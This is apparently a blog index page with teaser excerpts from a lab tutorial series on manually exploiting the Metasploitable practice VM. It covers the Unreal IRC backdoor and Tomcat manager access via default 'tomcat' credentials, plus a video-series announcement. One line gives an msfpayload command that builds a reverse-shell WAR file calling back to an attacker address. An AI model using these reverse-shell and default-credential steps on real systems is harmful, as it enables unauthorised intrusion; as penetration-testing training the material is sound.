Metasploitable without Metasploit – Unreal IRC

 

In continuing our series on compromising the Metasploitable machines, the next installment is on the Unreal IRC service.

This is a very quick exploit, which does not require any additional scripting or even downloading to get to work properly. Its a back door within the Unreal IRC daemon that allows a remote attacker to instantly gain root to the target machine. In fact, this method is actually faster than using Metasploit!

So first things first, nmap scan the machine to ensure that the service is running on the target.

nmap_6667

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

1409539753_thumb.png
So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

New Video Series

We are excited to announce we have started production on our first video series!  “Metasploitable without Metasploit”  The focus of this video series it to teach the up and coming InfoSec student how to manually exploit Metasploitable.  This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way.  This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.